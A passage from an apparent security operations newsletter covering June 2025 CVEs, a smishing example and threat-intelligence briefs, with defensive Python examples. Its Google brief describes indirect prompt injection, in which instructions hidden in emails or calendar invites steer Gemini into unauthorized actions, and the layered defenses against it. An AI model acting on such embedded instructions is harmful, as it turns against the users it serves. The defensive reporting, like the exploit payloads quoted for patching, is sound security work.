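    return host.lower().split(":")[0].rstrip(".")


WATCHLIST = {normalize(d.replace("[.]", ".")) for d in DEFANGED_IOCS}


def is_watched(host):
    """True for a watched name or a subdomain of it, matched on label boundaries."""
    host = normalize(host)
    return any(host == w or host.endswith("." + w) for w in WATCHLIST)


def summarize(lines, approved_clients=frozenset()):
    """Map each unapproved client to the watched hosts it contacted and when."""
    report = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed or truncated line
        ts, client, _method, host = parts[:4]
        if client in approved_clients or not is_watched(host):
            continue
        entry = report.setdefault(
            client, {"hosts": Counter(), "first_seen": ts, "last_seen": ts})
        entry["hosts"][normalize(host)] += 1
        # ISO 8601 UTC timestamps in one format sort correctly as strings.
        entry["first_seen"] = min(entry["first_seen"], ts)
        entry["last_seen"] = max(entry["last_seen"], ts)
    return report


# Constructed proxy log lines.
LOG = """\
2025-06-24T08:01:12Z 10.0.5.21 CONNECT api.icedrive.net:443
2025-06-24T08:01:40Z 10.0.5.21 CONNECT API.icedrive.net:443
2025-06-24T08:02:03Z 10.0.5.34 CONNECT app.koofr.net:443
2025-06-24T08:02:09Z 10.0.5.40 CONNECT notapi.icedrive.net.example.org:443
2025-06-24T08:03:30Z 10.0.5.40 CONNECT koofr.net.example.org:443
2025-06-24T08:04:00Z 10.0.5.55 GET updates.example.com
truncated line
""".splitlines()

if __name__ == "__main__":
    # 10.0.5.34 stands in for a workstation with a documented reason to use Koofr.
    for client, entry in summarize(LOG, approved_clients={"10.0.5.34"}).items():
        print(client, dict(entry["hosts"]), entry["first_seen"], entry["last_seen"])
```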
Security vulnerabilities are a common occurrence in managing any business’s organizational security. The prompt patching and remediation of any new vulnerabilities are critical to reducing the outside attack surface. Netizen’s Security Operations Center (SOC) has compiled five critical vulnerabilities from June that should be immediately patched or addressed if present in your environment. Detailed writeups below:
CVE-2024-54085
CVE-2024-54085 describes a critical authentication bypass vulnerability affecting American Megatrends International’s (AMI) SPx firmware, specifically within the Baseboard Management Controller (BMC). This flaw allows a remote attacker to bypass authentication mechanisms when interfacing through the Redfish Host Interface, enabling unauthorized access without user interaction or credentials. The vulnerability affects systems using AMI’s MegaRAC SPx firmware—commonly integrated into servers for out-of-band management—which magnifies its potential impact across enterprise environments and data centers.
The attack vector is particularly dangerous due to its placement at the firmware level. By abusing the Redfish API exposed by the BMC, an attacker can gain privileged access to critical server management functions. This includes the ability to issue power controls, flash firmware, or even wipe or reconfigure the host system remotely. Exploiting this interface requires no local access, no authentication, and no user interaction—only network reachability. As a result, the vulnerability poses a direct threat to the confidentiality, integrity, and availability of affected systems.
Reports published in June 2025 indicate that this flaw is being actively exploited in the wild. Attackers have used it to deploy destructive malware capable of bricking servers or persisting stealthily within BMC firmware. According to CISA and Eclypsium, exploitation campaigns have targeted thousands of vulnerable devices globally, and widespread scanning for exposed Redfish interfaces has been observed.
The vulnerability was officially assigned CVE-2024-54085 and carries maximum severity scores across CVSS v2 (10.0), v3.1 (9.8), and v4.0 (10.0), underscoring the total system compromise potential. Organizations with exposed or internet-facing BMC interfaces—especially those running outdated AMI SPx firmware—should prioritize patching and segmenting their management networks. Updates and mitigation guidance have been made available through vendors such as NetApp and advisories from national cybersecurity agencies. Given the nature of the vulnerability, immediate action is required to prevent exploitation and irreversible damage to critical infrastructure.
CVE-2025-6543
CVE-2025-6543, widely dubbed “Citrix Bleed 2,” is a critical memory overflow vulnerability affecting NetScaler ADC and NetScaler Gateway appliances. The flaw emerges when these appliances are configured in Gateway mode—specifically as a VPN virtual server, ICA Proxy, CVPN, RDP Proxy, or AAA virtual server. When exploited, it leads to unintended control flow and Denial of Service (DoS), allowing an unauthenticated attacker to crash affected services or cause unpredictable behavior.
This vulnerability was confirmed to be exploited as a zero-day prior to public disclosure. Its addition to CISA’s Known Exploited Vulnerabilities catalog and the subsequent emergency advisories from vendors and government agencies signal that threat actors moved quickly to abuse the flaw in the wild. Reports from June 2025 document the use of this bug in denial-of-service attacks targeting enterprise gateway infrastructure. The potential for remote exploitation without prior authentication makes it particularly attractive for both disruption campaigns and access footholds, depending on how it’s chained with other weaknesses.
While the CVSS v2 score appears moderate at 5.0 due to limited immediate impact on confidentiality and integrity, the CVSS v3 score is 7.5 and the CVSS v4 score reaches 9.2—highlighting how newer scoring systems better reflect real-world risks associated with denial-of-service on critical edge infrastructure. The low CVSS v2 score fails to capture the severity of an attack that can render VPN and remote access services unusable during business hours, or which could serve as a stepping stone in more complex intrusion paths.
Administrators running affected Citrix NetScaler versions are strongly urged to apply the emergency patches issued by Citrix and verify that public-facing services are not vulnerable. Beyond patching, affected organizations should review VPN and gateway logs for signs of repeated crashes or traffic anomalies beginning in mid-June 2025, which may indicate early-stage exploitation attempts or reconnaissance.
CVE-2024-0769
CVE-2024-0769 describes a critical path traversal vulnerability discovered in D-Link’s DIR-859 wireless router, version 1.06B01. The flaw lies in the HTTP POST request handler at the endpoint /hedwig.cgi, where the service parameter can be manipulated to perform directory traversal. By passing crafted input such as ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml, an unauthenticated remote attacker can access configuration files not intended to be publicly exposed, leading to unauthorized disclosure of sensitive system information.
The issue stems from a failure to properly sanitize input within the POST request handler. This allows external actors to bypass expected restrictions and reach arbitrary files within the router’s internal file system. The attacker does not require any special privileges or user interaction to exploit this flaw, and the attack can be conducted entirely over the network. Proof-of-concept code was made public and has been observed in use, suggesting this is an active risk for any remaining DIR-859 units still online.
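The missing input check, modelled in Python as an added example; this is not D-Link's firmware code, which the article does not show. It assumes a handler that maps a `service` name to an XML file under a single configuration directory, and the directory tree and the `etc/secret.xml` file are constructed for the demonstration.

```python
import os
import re
import tempfile

# Allowlist: alphanumeric labels joined by single "." or "-" (e.g. DHCPS6.BRIDGE-1).
SERVICE_RE = re.compile(r"[A-Za-z0-9]+(?:[.-][A-Za-z0-9]+)*")


def naive_path(base, service):
    """The flawed pattern: request input joined to a base directory unchecked."""
    return os.path.normpath(os.path.join(base, service + ".xml"))


def safe_path(base, service):
    """Return the file for `service` inside `base`, or raise ValueError."""
    # 1. Reject anything that is not a plain service name. This also rejects
    #    "/", "\\", "%", NUL and ".." because none of them fit the pattern.
    if not SERVICE_RE.fullmatch(service):
        raise ValueError("service name contains disallowed characters")
    # 2. Resolve symlinks, then confirm the result is still under the base
    #    directory (defence in depth against links planted inside it).
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, service + ".xml"))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError("resolved path escapes the configuration directory")
    if not os.path.isfile(candidate):
        raise ValueError("unknown service")
    return candidate


def demo():
    """Build a constructed tree and run both functions over sample inputs."""
    with tempfile.TemporaryDirectory() as root:
        getcfg = os.path.join(root, "htdocs", "webinc", "getcfg")
        os.makedirs(getcfg)
        os.makedirs(os.path.join(root, "etc"))
        open(os.path.join(getcfg, "DHCPS6.BRIDGE-1.xml"), "w").close()
        secret = os.path.join(root, "etc", "secret.xml")
        open(secret, "w").close()
        # A symlink inside the allowed directory that points outside it.
        os.symlink(secret, os.path.join(getcfg, "LINK.xml"))

        inputs = [
            "DHCPS6.BRIDGE-1",                                        # legitimate
            "../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml",  # from the article
            "../../../etc/secret",
            "..%2f..%2f..%2fetc%2fsecret",
            "LINK",
        ]
        results = {}
        for value in inputs:
            try:
                safe_path(getcfg, value)
                results[value] = "allowed"
            except ValueError:
                results[value] = "rejected"

        # The unchecked join walks out of getcfg and lands on the other file.
        escaped = naive_path(getcfg, "../../../etc/secret")
        naive_escapes = os.path.realpath(escaped) == os.path.realpath(secret)
        return results, naive_escapes


if __name__ == "__main__":
    outcome, naive_escapes = demo()
    for value, verdict in outcome.items():
        print(f"{verdict:9} {value}")
    print("naive join escapes base directory:", naive_escapes)
```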
This vulnerability is especially concerning due to the fact that the DIR-859 has reached end-of-life status. D-Link confirmed the device is no longer supported, meaning no firmware updates or patches will be released. As such, affected systems will remain perpetually vulnerable. Despite the CVSS v2 score being reported as only 5.0—likely due to its limited immediate impact on availability or integrity—the CVSS v3.1 score of 9.8 accurately reflects the true risk, as the flaw enables full remote file disclosure and potentially facilitates follow-on attacks.
The issue was published in January 2024 but updated in June 2025 after further analysis and public exploit activity. Due to its inclusion in CISA’s Known Exploited Vulnerabilities (KEV) catalog and a high EPSS probability of exploitation, it is strongly recommended that users immediately decommission any exposed DIR-859 units. Replacement with actively supported hardware and isolation of outdated equipment from public networks should be prioritized to prevent compromise.
CVE-2019-6693
CVE-2019-6693 describes a cryptographic weakness present in certain versions of Fortinet’s FortiOS operating system, which is used across a variety of the company’s security appliances. The flaw results from the use of a hard-coded cryptographic key to encrypt sensitive information in configuration backup files. An attacker who obtains such a backup—either through access to a compromised system or a leaked file—could decrypt portions of the content without needing to brute force or guess passwords, since the cipher key is static and known.
The exposed information includes user account passwords (excluding the administrator password), passphrases used to protect private keys, and any High Availability (HA) configuration passwords, if set. Because the administrator password is exempt, the immediate risk of full system takeover from decrypting the file is somewhat reduced; however, the remaining credentials may still allow lateral movement, access to protected services, or reconstruction of internal secrets—especially in environments with poor account segmentation or where users share credentials across systems.
Although this vulnerability was originally published in 2019, it was added to CISA’s Known Exploited Vulnerabilities catalog in June 2025, indicating that it remains a viable attack vector in real-world scenarios. The renewed interest likely stems from threat actors targeting backup files exfiltrated through other means, then decoding them using the now-public encryption key. The CVSS v3.1 score of 6.5 reflects the fact that the issue requires prior access to the backup file and does not permit direct execution or privilege escalation on its own.
Nonetheless, organizations that maintain FortiOS appliances should audit their backup file storage and transfer mechanisms, implement encrypted transport layers and secure storage practices, and ensure they are not relying on outdated backup formats. Wherever possible, administrators should move to newer versions of FortiOS that remediate this flaw and remove reliance on insecure static key usage in cryptographic processes.
CVE-2025-5419
CVE-2025-5419 describes a high-severity vulnerability in the V8 JavaScript engine used by Google Chrome, prior to version 137.0.7151.68. The flaw stems from an out-of-bounds read and write condition that can be triggered through a crafted HTML page, potentially leading to heap corruption. This kind of memory error allows attackers to manipulate the memory layout of the running process, which can result in remote code execution under the context of the browser.
The vulnerability is notable for its low attack complexity and lack of user privileges required to exploit it. While user interaction is necessary (typically in the form of visiting a malicious web page), once triggered, the flaw can allow attackers to execute arbitrary code, access sensitive information, or crash the browser. It is particularly dangerous in targeted phishing or watering hole campaigns where crafted JavaScript payloads are embedded in compromised or maliciously hosted sites.
The CVSS v3 score of 8.8 reflects the severity of the potential impact on confidentiality, integrity, and availability, despite requiring user interaction. The older CVSS v2 system rates this flaw at a full 10.0, capturing the remote exploitation potential with no authentication needed. This disparity highlights the limitations of scoring systems when evaluating browser-based exploitation chains involving memory corruption.
This vulnerability was confirmed to have been exploited in the wild and was added to CISA’s Known Exploited Vulnerabilities catalog in June 2025. It is part of an ongoing pattern of attackers targeting the V8 engine, often chaining JavaScript engine flaws with sandbox escapes or privilege escalation vulnerabilities to compromise host systems. Organizations using Google Chrome in sensitive environments should prioritize updates to patched versions and consider implementing browser isolation or application sandboxing to reduce the risk from future JavaScript engine vulnerabilities.
Phish Tale of the Week
Oftentimes, phishing campaigns created by malicious actors target users through social engineering. For example, in this message, the actors pose as an unnamed company. They're sending us a text message telling us that our Coinbase account was logged in to from Belgium and that we need to call support. It seems both urgent and genuine, so why shouldn't we? Luckily, there are plenty of reasons that point to this being a scam.
Here’s how we can tell not to fall for this phish:
The first warning sign for this SMS is the context in which it was sent. When I received this SMS, I immediately knew not to click on the link due to the fact that I do not have a Coinbase account. On top of that, it's very apparent that this message was blasted out to random numbers: the message doesn't even include my name or attempt to provide any level of familiarity.
The second warning sign in this text is the messaging. This message tries to create a sense of urgency in order to get you to take action by using language such as “logging in from Belgium.” Phishing and smishing scams commonly attempt to create a sense of urgency or confusion in their messages in order to get you to click their link without thinking about it first. Always be sure to thoroughly inspect the style and tone of all texts before following a link or other attachment sent through SMS.
The final warning sign for this text is the wording; in our case the smisher suggests we call a random number, something that Coinbase support would never do. All of these factors point to the above being a smishing text, and a very unsophisticated one at that.
General Recommendations:
A phishing attack will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via your text messages.
Scrutinize your messages before clicking anything. Have you ordered anything recently? Does this order number match the one you already have? Did the message come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
Verify that the sender is actually from the company sending the message.
Did you receive a message from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc.? A legitimate company will never ask for PII via instant message or email.
Do not give out personal or company information over the internet.
Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.
Many phishing messages pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.
Cybersecurity Brief
In this month’s Cybersecurity Brief:
Iranian Hackers Maintain Long-Term Access to Middle East CNI via VPN Exploits and Malware
In a report published on May 3, 2025, FortiGuard Incident Response (FGIR) team detailed a significant cyberattack campaign attributed to an Iranian state-sponsored hacker group. This campaign targeted a Middle Eastern Critical National Infrastructure (CNI) entity over a two-year period, from at least May 2023 to February 2025. The attack was marked by extensive espionage and strategic network prepositioning, often used to secure persistent access for future operations.
The threat actor behind the breach has been linked to the Iranian state-sponsored hacking group Lemon Sandstorm (also known as Rubidium, Parisite, Pioneer Kitten, and UNC757). This group has been active since at least 2017 and has targeted multiple sectors across the globe, including aerospace, oil and gas, water, and electricity infrastructure in the U.S., Europe, the Middle East, and Australia. The group’s modus operandi involves exploiting vulnerabilities in VPN technologies and deploying a variety of malware to maintain long-term access.
The cyberattack campaign made use of known vulnerabilities in popular VPN systems, including Fortinet, Pulse Secure, and Palo Alto Networks, to gain initial access to the target’s network. Once inside, the attackers deployed a series of backdoors and malware to maintain persistent access. According to the report, the attack unfolded in multiple stages:
Stage 1 (May 2023 – April 2024): The attackers established their foothold by using stolen login credentials to access the victim’s SSL VPN system. They dropped web shells on public-facing servers and deployed three backdoors—Havoc, HanifNet, and HXLibrary—for long-term access.
Stage 2 (April 2024 – November 2024): The attackers consolidated their access by planting more web shells and deploying an additional backdoor, NeoExpressRAT. The attackers used tools such as Plink and Ngrok to move deeper into the network, exfiltrating sensitive emails and conducting lateral movements to the virtualization infrastructure.
Stage 3 (November 2024 – December 2024): After the victim took containment measures, the attackers responded by deploying additional web shells and backdoors, including MeshCentral Agent and SystemBC.
Stage 4 (December 2024 – Present): The attackers attempted to infiltrate the network again by exploiting vulnerabilities in ZKTeco BioTime devices (CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952). They also launched spear-phishing attacks targeting 11 employees to harvest Microsoft 365 credentials after the organization successfully removed the adversary’s access.
The attackers used several malware families throughout the intrusion, including both open-source tools and custom-built malware. Notable among them were:
Havoc: A C2 backdoor written in C++ and Golang that was injected into a newly created “cmd.exe” process. Havoc supports various commands to control compromised hosts and uses HTTP, HTTPS, and SMB protocols for communication with the C2 server.
HanifNet: A .NET executable used to retrieve and execute commands from the C2 server. First deployed in August 2023, it helped maintain control over compromised systems.
HXLibrary: A malicious IIS module that retrieves text files from Google Docs to connect to the C2 server. Deployed in October 2023, it was used to execute commands on the infected systems.
NeoExpressRAT: A backdoor deployed in August 2024 that retrieves a configuration from the C2 server, likely using Discord for follow-on communications.
MeshCentral Agent and SystemBC: Deployed as additional backdoors after initial containment efforts, used to maintain access and perform lateral movements within the network.
Other tools included CredInterceptor (for harvesting credentials), RemoteInjector (for loading next-stage payloads), and RecShell (a web shell used for reconnaissance).
A significant aspect of the attack was the targeting of the victim’s restricted Operational Technology (OT) network. While there is no evidence to suggest the OT network was breached, the adversary’s extensive reconnaissance indicates that it was a primary target. The threat actors’ careful, multi-stage exploitation of the network suggests a focused attempt to disrupt OT-adjacent systems that could have led to more severe impacts on the CNI infrastructure.
The attacker’s persistence and ability to avoid detection were notable. The report reveals that throughout the intrusion, the group used multiple proxies and custom implants to bypass network segmentation, a strategy commonly employed to ensure continued access to sensitive systems. In later stages of the attack, the attackers chained together several proxy tools to access internal network segments, demonstrating sophisticated techniques for maintaining long-term access.
In a follow-up report published on June 23, 2025, Fortinet provided additional details about the Havoc C2 framework. This backdoor, written in C++ and Golang, has a modular design that allows for the flexible execution of multiple commands. It supports a variety of functionalities, including process enumeration, lateral movement, and token manipulation. Havoc also enables attackers to inject shellcode into the memory of compromised systems, further enhancing its ability to control infected devices remotely.
Citrix Bleed 2 and SAP GUI Flaws: Critical Vulnerabilities Expose Sensitive Data
Two recently disclosed vulnerabilities—Citrix Bleed 2 and SAP GUI input history flaws—have raised alarms across the cybersecurity industry, putting sensitive data at risk.
Citrix has patched a critical vulnerability in its NetScaler ADC (Application Delivery Controller) and NetScaler Gateway, tracked as CVE-2025-5777. This flaw, rated CVSS 9.3, allows attackers to bypass authentication protections and potentially steal valid session tokens from memory through malformed requests. This vulnerability affects appliances configured as a Gateway or AAA virtual server.
Discovered by security researcher Kevin Beaumont, this flaw shares similarities with CVE-2023-4966, a high-profile vulnerability that resulted in widespread exploitation two years ago. Citrix has already issued patches for affected versions of NetScaler ADC and NetScaler Gateway, with the updates being available for versions 14.1-43.56 and later. The vulnerability also impacts older NetScaler ADC versions (13.1 and 12.1).
To mitigate the risks, Citrix recommends running commands to terminate all active ICA and PCoIP sessions after the patches have been applied. Additionally, users of unsupported versions (12.1 and 13.0) are urged to upgrade to a supported version, as these versions are now end-of-life (EOL) and no longer receive official support.
While there is no evidence that this vulnerability has been weaponized, Benjamin Harris, CEO at watchTowr, emphasized its severity, comparing it to Citrix Bleed, a vulnerability that caused significant damage in previous years. Harris noted that changes in the CVE description suggest that the vulnerability is more critical than initially understood.
In another cybersecurity alert, vulnerabilities discovered in SAP GUI for both Windows and Java have exposed sensitive information stored locally on devices. Tracked as CVE-2025-0055 and CVE-2025-0056, these vulnerabilities involve the insecure storage of SAP GUI input history. This feature, intended to enhance user efficiency by storing past inputs, inadvertently saved sensitive data, such as usernames, social security numbers, bank account numbers, and internal SAP table names, in an insecure manner.
The flaw exists because SAP GUI for Windows uses weak XOR encryption to store input history in SAPHistory.db files, making it easily decryptable. Meanwhile, SAP GUI for Java stores this information unencrypted as Java serialized objects. Both cases present significant risks, as an attacker with access to the victim’s directory could easily retrieve the sensitive data stored in these files.
The vulnerability is particularly dangerous for environments where attackers can gain administrative privileges or access the user directory, allowing them to exfiltrate valuable data. Pathlock researcher Jonathan Stross warned that data exfiltration can occur through USB Rubber Ducky (HID injection attacks) or phishing tactics.
In response, SAP issued patches in its January 2025 updates, addressing the flaws and recommending that organizations disable input history functionality and delete the historical data files to mitigate potential risks.
For Citrix users, upgrading to the latest supported versions is crucial, as CVE-2025-5777 poses a significant risk of session hijacking. Administrators should also follow Citrix’s recommendations to terminate existing sessions as part of the remediation process. For SAP GUI users, securing local machines and deleting unencrypted input history files is necessary to protect sensitive data from unauthorized access.
For detailed guidance on mitigating these vulnerabilities, organizations should consult Citrix and SAP’s official advisories and consider engaging in regular penetration testing and vulnerability scanning to identify and address security gaps in their infrastructure.
The Department of Homeland Security issued a National Terrorism Advisory Bulletin (NTAS) on June 22, 2025, warning about cyberattack risks related to recent tensions between the US and Iran. This alert follows U.S. airstrikes on June 21, 2025, which targeted key Iranian nuclear facilities (Fordow, Natanz, and Isfahan) under President Donald Trump’s orders, in an attempt to neutralize what he’s called “the nuclear threat posed by the world’s No. 1 state sponsor of terror.”
The DHS bulletin, set to expire on September 22, 2025, flagged the increased likelihood of low-level cyberattacks against U.S. networks by pro-Iranian hacktivists and potential actions from Iranian government-affiliated actors. “Low-level cyber attacks against U.S. networks by pro-Iranian hacktivists are likely, and cyber actors affiliated with the Iranian government may conduct attacks against U.S. networks,” the alert stated.
Iran’s Longstanding Cyber Strategy
The DHS alert emphasized that Iranian-affiliated groups have a long history of targeting poorly secured U.S. networks and internet-connected devices for disruptive cyberattacks, primarily through DDoS attacks. Brian Harrell, former DHS assistant secretary, has also pointed out the increase in Iran’s capabilities. “Iran’s cyber strategy is likely [in] cooperation with Russia, which, given current tensions, could be a real possibility,” Harrell noted, referencing the 2012 Shamoon virus that crippled over 30,000 computers in major energy companies.
In 2024, Iranian-backed cyber actors breached U.S. water infrastructure in response to Israel’s military actions against Iran. The bulletin warned that similar tactics might be used to retaliate against U.S. airstrikes on Iran’s nuclear sites.
Growing Use of Social Engineering
The DHS bulletin also noted Iran’s increasing use of social engineering tactics. Shortly after the U.S. airstrikes, an Iranian hacker group claimed responsibility for a DDoS attack on Trump’s social media platform, Truth Social. This attack, which briefly took the platform offline, followed Trump’s announcement of the strikes on Iran’s nuclear facilities.
Additionally, Iranian-backed groups have utilized artificial intelligence tools for spreading disinformation, as explained in a previous OpenAI blog. The report detailed how Iranian actors used fake news websites to influence U.S. voters during the 2024 election cycle. Although the campaign failed to gain significant traction, it demonstrated the persistence of Iranian information warfare tactics.
Risk of Retaliatory Violence
The DHS alert also addressed the risk of physical violence in the U.S., noting that Iranian supporters and extremist groups might mobilize in response to the ongoing conflict. The alert warned that the threat of hate crimes or attacks against individuals perceived as Jewish, pro-Israel, or linked to the U.S. government or military could increase.
“The conflict could also motivate violent extremists and hate crime perpetrators seeking to attack targets perceived to be Jewish, pro-Israel or linked to the U.S. government or military in the homeland,” the DHS added.
Preventative Measures and Public Awareness
Given the increased risks from Iranian-linked cyber actors, DHS advises U.S. businesses, government agencies, and individuals to follow cybersecurity best practices and stay vigilant. The department recommends employing DDoS mitigation strategies and monitoring for signs of data exfiltration or any unauthorized access attempts. Organizations are encouraged to report suspicious activities to local law enforcement, or the FBI through the National Suspicious Activity Reporting Initiative.
Comments on Ceasefire Talks
Meanwhile, on June 24, 2025, President Trump publicly voiced his frustration with the ongoing conflict between Iran and Israel in spite of initiatives to broker a ceasefire. “These guys got to calm down. Ridiculous,” Trump remarked after a missile attack from Iran targeted Israel, escalating tensions. Trump had earlier brokered a ceasefire between the two nations, but the violence continued, with Israel confirming a missile strike that killed four people in Israel.
The rising tensions between Israel and Iran have already contributed to heightened threat assessments across global security environments. The DHS alert also noted that if Iranian leadership issues a religious ruling calling for retaliatory violence, there could be an increase in extremist actions within the U.S.
Google Strengthens GenAI Security with Multi-Layered Defenses to Combat Prompt Injection Attacks
In response to the growing threat of prompt injection attacks, Google has unveiled a series of robust security measures designed to safeguard its generative AI models, particularly Gemini, from evolving exploitation techniques. The latest vulnerabilities—referred to as indirect prompt injections—pose significant risks as malicious actors exploit external data sources, like emails and calendar invites, to manipulate AI systems into performing dangerous or unauthorized actions. These attacks circumvent traditional defense mechanisms by embedding harmful instructions within trusted data sources, tricking the AI into executing them.
To mitigate these risks, Google has implemented a layered defense strategy aimed at raising the difficulty and cost of launching successful attacks. These defenses include prompt injection content classifiers to filter out harmful instructions, the reinforcement of security through special markers placed in untrusted data, and markdown sanitization to block external malicious URLs. Additionally, the company has introduced a user confirmation framework, requiring approval before risky actions are executed, and integrated end-user notifications to alert users about potential prompt injections.
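Two of the layers named above, markers around untrusted data and markdown sanitization, can be sketched as follows. This is an added example, not Google's implementation: the allowlist, the marker format, the host names and the sample output are assumptions, and the sanitizer covers inline links and images only.

```python
import re
import secrets
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"docs.example.com"}  # assumption: hosts this app trusts

# Inline markdown images and links: ![alt](url "title") / [text](url "title")
MD_INLINE = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')

def is_allowed(url):
    """Allow only https URLs whose host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False  # malformed URL: treat as external
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS

def sanitize_markdown(text):
    """Drop external images, unlink external links, keep allowlisted ones."""
    def replace(match):
        bang, label, url = match.groups()
        if is_allowed(url):
            return match.group(0)
        return "[image removed]" if bang else label
    return MD_INLINE.sub(replace, text)

def wrap_untrusted(content, nonce=None):
    """Fence untrusted data with per-request markers it cannot predict."""
    nonce = nonce or secrets.token_hex(8)
    return f"<<untrusted {nonce}>>\n{content}\n<<end untrusted {nonce}>>"

# Constructed model output containing external and allowlisted URLs.
CONSTRUCTED_OUTPUT = (
    "Summary ready. ![status](https://untrusted.example/p.png?d=VALUE) "
    "See [the guide](https://docs.example.com/guide) or "
    "[click](http://docs.example.com/x)."
)

if __name__ == "__main__":
    print(sanitize_markdown(CONSTRUCTED_OUTPUT))
    print(wrap_untrusted("Calendar invite body goes here.", "demo"))
```

Comparing the parsed hostname, rather than searching the URL string for a trusted name, is what rejects look-alike URLs such as `https://docs.example.com@untrusted.example/`.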
Despite these improvements, Google acknowledged that the threat landscape is shifting. Malicious actors are increasingly utilizing adaptive attacks, deploying automated red-teaming tools to circumvent these defenses. The vulnerability underscores the challenges AI models face in distinguishing between legitimate user instructions and manipulative commands embedded within data. According to Google DeepMind, addressing these issues will require continuous advancements in AI system security, incorporating defenses at each layer—from the model’s core understanding to the application and hardware infrastructure.
Researchers from institutions like ETH Zurich and Carnegie Mellon University, along with Google’s own DeepMind, have highlighted the dangers posed by AI systems vulnerable to prompt injections. These models are capable of generating harmful content, including weapon instructions, phishing schemes, and even polymorphic malware. As AI agents continue to evolve, their ability to unlock new attack vectors for adversaries, such as extracting personally identifiable information (PII) or launching tailored attacks, becomes increasingly alarming.
The insights gathered from ongoing stress tests and red-teaming benchmarks indicate that while AI models excel at prompt injection attacks, they still struggle with system exploitation and model inversion tasks. However, the efficiency with which AI agents solve challenges compared to human operators emphasizes the transformative potential these systems have in improving security workflows.
Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages
In April 2025, a series of cyberattacks targeted two of the U.K.’s most prominent retailers, Marks & Spencer (M&S) and Co-op, causing significant disruption and financial damage. According to the Cyber Monitoring Centre (CMC), these attacks have been classified as a “single combined cyber event” due to the timing, similar tactics, and a threat actor’s claim of responsibility for both incidents.
The breach, which has been classified as a “Category 2 systemic event,” is estimated to have cost between £270 million ($363 million) and £440 million ($592 million). The security breach, which focused on IT help desks through advanced social engineering tactics, has had a deep impact on the two companies and their partners. CMC continues its attribution efforts but strongly suspects the notorious cybercrime group, Scattered Spider (also known as UNC3944), is behind the attacks.
The group, previously affiliated with The Com, is known for its advanced social engineering techniques, particularly in impersonating IT staff to gain unauthorized access. The consequences of this breach extend beyond M&S and Co-op, with ripple effects for their suppliers, partners, and service providers.
In addition, Scattered Spider’s attacks are no longer limited to the retail sector. The Google Threat Intelligence Group (GTIG) has recently warned that the group has shifted its focus to U.S. insurance companies, using similar social engineering tactics to target help desks and call centers. This shift in targets highlights the growing concern surrounding Scattered Spider’s evolving strategies and growing impact.
While Marks & Spencer’s supplier Tata Consultancy Services (TCS) has publicly confirmed that its systems were not compromised in the attack, internal investigations continue to explore the possibility of TCS’s systems being used as a stepping stone for the breach.
The increase in attacks from groups like Scattered Spider, combined with the shift toward more sophisticated techniques like those seen in Qilin ransomware operations, has prompted heightened alertness across critical industries. These developments underscore the escalating threats posed by cybercriminals targeting high-profile sectors, making it imperative for organizations to reinforce their cybersecurity defenses.